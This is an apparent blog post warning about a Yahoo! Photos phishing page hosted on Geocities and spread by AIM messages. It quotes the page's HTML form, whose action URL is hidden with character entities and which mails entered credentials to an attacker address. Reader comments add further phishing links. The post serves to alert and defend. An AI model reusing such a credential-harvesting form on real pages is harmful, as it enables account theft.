Alert: “pupzz2000” phishing attack via Yahoo! Geocities

http://geocities.com/pupzz2000/

This URL is being sent around via IM. It’s a very convincing page that looks like a login for Yahoo! Photos, being circulated by what I suspect is a virus/trojan that uses AIM to propagate as I received this URL via an IM from someone I knew.

Looking at the page’s source (as I was skeptical about having to log into Yahoo! Photos at a geocities.com URL), I found:

<FORM METHOD="POST" ACTION="&#104;&#116;&#116;&#112;://&#119;&#119;&#119;&#050;&#046;&#102;&#105;&#098;&#101;&#114;&#098;&#105;&#116;&#046;&#110;&#101;&#116;/&#102;&#111;&#114;&#109;/&#109;&#097;&#105;&#108;&#116;&#111;&#046;&#099;&#103;&#105;" ENCTYPE="x-www-form-urlencoded">

	<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
    <INPUT TYPE="hidden" NAME="Mail_To" VALUE="dielameragainlol@googlemail.com">
    <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">

Decoding that form ACTION, it is the following URL:

http://www2.fiberbit.net/form/mailto.cgi

This Geocities page needs to be shut down ASAP before too many people get their Yahoo! accounts compromised. I’ve already sent a message to Yahoo! via it’s abuse web contact form. But, keep on the lookout for this kind of thing.

Tags:
,
,
,

Comments

  1. Nedward! 🙂
    missed you and wanted to say hi. will i ever see you again?

  2. I don’t really understand how people can fall for this. I mean seriously I don’t think a big site like yahoo will want you to log in at geocities.com.

  3. Well .. sometimes yahoo photos needs you to sign up to view privately shared albums. It is foolish, but easy to confuse “hot pics” with that, and provide your login. The original mail appears “clean”, as it comes from a compromised account.

    The latest email doing the round gives the link as http://geocities.com/my_new_hot_pics/

  4. bradford says:

    This has changed to a paypal phish using the harvested yahoo contacts:
    http://www.castlecops.com/t160455-ATTENTION_Possible_breaking_News.html

  5. it’s back. just had a link – http://geocities.com/hot_new_one/ – from someone i know who isnt very tech savvy or paranoid about what she clicks on, as with the above i am suspicious of these things so i checked the source and its also fiberbit. a Google search led me to this page.

Speak Your Mind

*